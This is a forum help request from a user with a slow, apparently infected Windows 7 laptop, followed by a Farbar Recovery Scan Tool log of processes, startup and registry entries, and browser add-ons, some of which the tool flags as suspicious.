Javascript Disabled Detected

You currently have javascript disabled. Several functions may not work. Please re-enable javascript to access full functionality.

Slow Computer, Multiple Infections Detected

Started by dreamtime , Nov 29 2016 06:57 PM

rootkit trojan

This topic is locked

#1
dreamtime

Posted 29 November 2016 - 06:57 PM

New Member

Member
6 posts

Hello,

I'm working on troubleshooting a laptop that has been running slowly, most notably when booting up and when launching a web browser. Navigating the Internet on any browser is also rather slow, and other devices on the network don't seem to have any trouble.

Malware was my first thought and it appears this computer is indeed infected. I have tried to follow removal guides, but either something else is interfering or I'm in over my head.

I've run various scans with different security software and got mixed results. Malwarebytes says it's infected with Trojan.Fileless.MTGen, Rootkit.Fileless.MTGen, a couple PUPs and a few false positives (files I have confirmed are safe), while Kapersky Security Scan reports HEUR:Trojan.WinLNK.Starter.gen and Trojan.Multi.GenAutorunReg.a.

As per the instructions for using this forum, I have run FRST and the requested logs are posted below. Thank you for any help you can offer.

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 27-11-2016
Ran by Owner (administrator) on OWNER-HP (29-11-2016 18:14:19)
Running from C:\Users\Owner\Desktop
Loaded Profiles: Owner (Available Profiles: Owner)
Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\AMSP\coreServiceShell.exe
(CinemaNow, Inc.) C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowSvc.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\UniClient\UiFrmwrk\uiWatchDog.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\AMSP\coreFrameworkHost.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\UniClient\UiFrmwrk\uiSeAgnt.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.31.5\GoogleCrashHandler64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Online Games Manager\ogmservice.exe
(iWin Inc.) C:\Program Files (x86)\Pogo Games\PGMTrusted.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSvcHost.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtWatchDog.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSessionAgent.exe
(Trend Micro Inc.) C:\Program Files\Trend Micro\TMIDS\PwmSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Exent Technologies Ltd.) C:\Program Files (x86)\Free Ride Games\GPlayer.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
() C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Software Updater Beta\ksu.exe
() C:\Program Files\Trend Micro\TMIDS\tower\PwmTower.exe
(Hewlett-Packard) C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Main.exe
() C:\Program Files\Trend Micro\TMIDS\tower\PwmTower.exe
() C:\Program Files\Trend Micro\TMIDS\tower\PwmTower.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(AO Kaspersky Lab) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Service.exe
(HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsd.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
(Advanced Micro Devices, Inc.) C:\Windows\System32\atibtmon.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2281256 2013-07-05] (Synaptics Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6489704 2013-07-16] (Realtek Semiconductor)
HKLM\...\Run: [HPWirelessAssistant] => C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Main.exe [363064 2010-06-18] (Hewlett-Packard Company)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [2327952 2010-07-21] (Microsoft Corporation)
HKLM\...\Run: [Trend Micro Client Framework] => C:\Program Files\Trend Micro\UniClient\UiFrmWrk\UIWatchDog.exe [246264 2015-07-16] (Trend Micro Inc.)
HKLM\...\Run: [Platinum] => C:\Program Files\Trend Micro\Titanium\plugin\Pt\PtSessionAgent.exe [1258496 2015-07-16] (Trend Micro Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-06-17] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Microsoft Default Manager] => C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [41056 2013-05-08] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [49208 2011-03-24] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [586296 2010-11-09] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation)
HKU\S-1-5-19\...\Run: [Exetender] => C:\Program Files (x86)\Free Ride Games\GPlayer.exe [4973456 2013-03-14] (Exent Technologies Ltd.)
HKU\S-1-5-20\...\Run: [Exetender] => C:\Program Files (x86)\Free Ride Games\GPlayer.exe [4973456 2013-03-14] (Exent Technologies Ltd.)
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [HPAdvisorDock] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\DOCK\HPAdvisorDock.exe [1712184 2010-02-09] ()
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [Exetender] => C:\Program Files (x86)\Free Ride Games\GPlayer.exe [4973456 2013-03-14] (Exent Technologies Ltd.)
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [WeatherBug] => C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe [146736 2013-11-13] ()
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [KSS] => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [1556448 2015-12-15] (AO Kaspersky Lab)
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Run: [**cahlhsssc<*>] => "C:\Users\Owner\AppData\Local\767c1f6b\2930e3b3.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\...\Policies\Explorer: [NoDesktopCleanupWizard] 1
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Control Panel\Desktop\\SCRNSAVE.EXE ->
HKU\S-1-5-18\...\Run: [Exetender] => C:\Program Files (x86)\Free Ride Games\GPlayer.exe [4973456 2013-03-14] (Exent Technologies Ltd.)
HKU\S-1-5-18\...\Run: [KSS] => C:\Program Files (x86)\Kaspersky Lab\Kaspersky Security Scan\kss.exe [1556448 2015-12-15] (AO Kaspersky Lab)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Kaspersky Software Updater Beta.lnk [2016-11-26]
ShortcutTarget: Kaspersky Software Updater Beta.lnk -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Software Updater Beta\ksu.exe (AO Kaspersky Lab)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk [2013-12-25]
ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office10\OSA.EXE (Microsoft Corporation)
Startup: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0844133a.lnk [2016-11-29]
ShortcutTarget: 0844133a.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c3f6703c.lnk [2016-11-26]
ShortcutTarget: c3f6703c.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerReg Scheduler.exe [2012-11-11] ()

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{C05AD519-926E-46DA-A286-D6B3A0E85834}: [DhcpNameServer] 168.94.0.15 168.94.0.14
Tcpip\..\Interfaces\{F0E8B706-0741-4AF1-9C36-E152BF2CFE79}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://my.xfinity.com/
HKU\S-1-5-21-2406275642-2542123288-3132197554-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT/1
SearchScopes: HKLM -> DefaultScope {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM -> {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 -> DefaultScope {EEE6C360-6118-11DC-9C72-001320C79847} URL =
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 -> {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> DefaultScope {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {6B8BA6E1-8F10-4950-B910-5A0B3FBECC12} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {A146E056-68CF-4452-8523-A85234CC5BB8} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {DD66E0F9-891E-4029-BFE7-4D11B4EC6A9F} URL = hxxps://search.yahoo.com/search?p={searchTerms}&fr=yset_ie_syc_oracle&type=orcl_default
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {F3365E98-A4CC-465D-8C1C-98E63E1F3FFA} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-2406275642-2542123288-3132197554-1000 -> {FAF791E8-0FFE-4B3C-9EB9-61CE90D5B646} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
BHO: Trend Micro Security Toolbar Helper -> {43C6D902-A1C5-45c9-91F6-FD9E90337E18} -> C:\Program Files\Trend Micro\Titanium\plugin\ToolbarIE64\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_111\bin\ssv.dll [2016-11-26] (Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO: Trend Micro Network Filter Plugin -> {959A5673-7971-48e6-AF54-58F745AC4ABC} -> C:\Program Files\Trend Micro\AMSP\module\20013\3.8.1222\2.0.1084\TmopIEPlg.dll [2015-07-16] (Trend Micro Inc.)
BHO: Trend Micro IE Protection -> {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} -> C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\TmBpIe64.dll [2016-06-15] (Trend Micro Inc.)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-11-26] (Oracle Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2016-08-23] (HP Inc.)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2013-05-08] (Adobe Systems Incorporated)
BHO-x32: Unit -> {2C4BA31C-0C15-11E2-90C7-9BFCBEB168B3} -> C:\Users\Owner\AppData\Local\UnitLayers\temp.dat [2013-04-06] ()
BHO-x32: Trend Micro Security Toolbar Helper -> {43C6D902-A1C5-45c9-91F6-FD9E90337E18} -> C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO-x32: GamesBar -> {6F282B65-56BF-4BD1-A8B2-A4449A05863D} -> C:\Program Files (x86)\GamesBar\oberontb.dll => No File
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-11-26] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Trend Micro Network Filter Plugin -> {959A5673-7971-48e6-AF54-58F745AC4ABC} -> C:\Program Files\Trend Micro\AMSP\module\20013\3.8.1222\2.0.1084\TmopIEPlg32.dll [2015-07-16] (Trend Micro Inc.)
BHO-x32: Trend Micro IE Protection -> {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} -> C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\TmBpIe32.dll [2016-06-15] (Trend Micro Inc.)
BHO-x32: Bing Bar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-02-28] (Microsoft Corporation.)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-11-26] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-08-23] (HP Inc.)
Toolbar: HKLM - Trend Micro Security Toolbar - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files\Trend Micro\Titanium\plugin\ToolbarIE64\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
Toolbar: HKLM-x32 - GamesBar - {6F282B65-56BF-4BD1-A8B2-A4449A05863D} - C:\Program Files (x86)\GamesBar\oberontb.dll No File
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll [2011-02-28] (Microsoft Corporation.)
Toolbar: HKLM-x32 - Trend Micro Security Toolbar - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
DPF: HKLM-x32 {6A060448-60F9-11D5-A6CD-0002B31F7455}
DPF: HKLM-x32 {D27CDB6E-AE6D-11CF-96B8-444553540000} hxxp://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Handler-x32: cdo - {CD00020A-8B95-11D1-82DB-00C04FB1625D} - C:\Program Files (x86)\Common Files\Microsoft Shared\Web Folders\PKMCDO.DLL [2001-01-22] (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation)
Handler: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\TmBpIe64.dll [2016-06-15] (Trend Micro Inc.)
Handler-x32: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\TmBpIe32.dll [2016-06-15] (Trend Micro Inc.)
Handler: tmop - {69FD7CE3-4604-4fe6-967C-49B9735CEE70} - C:\Program Files\Trend Micro\AMSP\module\20013\3.8.1222\2.0.1084\TmopIEPlg.dll [2015-07-16] (Trend Micro Inc.)
Handler-x32: tmop - {69FD7CE3-4604-4fe6-967C-49B9735CEE70} - C:\Program Files\Trend Micro\AMSP\module\20013\3.8.1222\2.0.1084\TmopIEPlg32.dll [2015-07-16] (Trend Micro Inc.)
Handler: tmtb - {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files\Trend Micro\Titanium\plugin\ToolbarIE64\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
Handler-x32: tmtb - {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files\Trend Micro\Titanium\UIFramework\ToolbarIE.dll [2015-12-21] (Trend Micro Inc.)
Handler: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\Trend Micro\Titanium\plugin\ToolbarIE64\ProToolbarIMRatingActiveX.dll [2015-07-16] (Trend Micro Inc.)
Handler-x32: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\Trend Micro\Titanium\UIFramework\ProToolbarIMRatingActiveX.dll [2015-07-16] (Trend Micro Inc.)

FireFox:
========
FF ProfilePath: C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\c5r6u3tc.default [2016-11-29]
FF Homepage: Mozilla\Firefox\Profiles\c5r6u3tc.default -> hxxp://xfinity.comcast.net/?cid=mtmh07162013
FF NetworkProxy: Mozilla\Firefox\Profiles\c5r6u3tc.default -> no_proxies_on", "https://localhost, localhost, 127.0.0.1"
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\firefoxextension
FF Extension: (Trend Micro BEP Firefox Extension) - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\firefoxextension [2016-10-21]
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Trend Micro\AMSP\module\20002\9.1.1089\9.1.1089\firefoxextension
FF HKLM-x32\...\Firefox\Extensions: [{22181a4d-af90-4ca3-a569-faed9118d6bc}] - C:\Program Files\Trend Micro\Titanium\UIFramework\Toolbar\firefoxextension
FF Extension: (Trend Micro Toolbar) - C:\Program Files\Trend Micro\Titanium\UIFramework\Toolbar\firefoxextension [2016-11-13]
FF HKLM-x32\...\Firefox\Extensions: [{BBB77B49-9FF4-4d5c-8FE2-92B1D6CD696C}] - C:\Program Files\Trend Micro\AMSP\module\20013\FxExt\firefoxextension
FF Extension: (Trend Micro Osprey Firefox Extension) - C:\Program Files\Trend Micro\AMSP\module\20013\FxExt\firefoxextension [2016-10-22]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_207.dll [2016-11-12] ()
FF Plugin: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-11-26] (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-11-26] (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_207.dll [2016-11-12] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2010-05-05] (Adobe Systems, Inc.)
FF Plugin-x32: @exent.com/npExentCtl,version=7.0.0.0 -> C:\Program Files (x86)\Free Ride Games\npExentCtl.dll [2009-12-27] (Exent Technologies Ltd.)
FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-11-26] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-11-26] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-04-17] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-11-26] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-11-26] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\6\NP_wtapp.dll [2012-10-23] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll [2013-05-08] (Adobe Systems Inc.)
FF Plugin-x32: www.exent.com/GameTreatWidget -> C:\Program Files (x86)\Free Ride Games\NPGameTreatPlugin.dll [No File]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\firefox.cfg [2013-07-16] <==== ATTENTION

Chrome:
=======
CHR Profile: C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default [2016-11-26]
CHR Extension: (Google Slides) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-11-26]
CHR Extension: (Google Docs) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-11-26]
CHR Extension: (Google Drive) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-11-26]
CHR Extension: (YouTube) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-11-26]
CHR Extension: (Google Sheets) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-11-26]
CHR Extension: (Google Docs Offline) - C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-11-26]
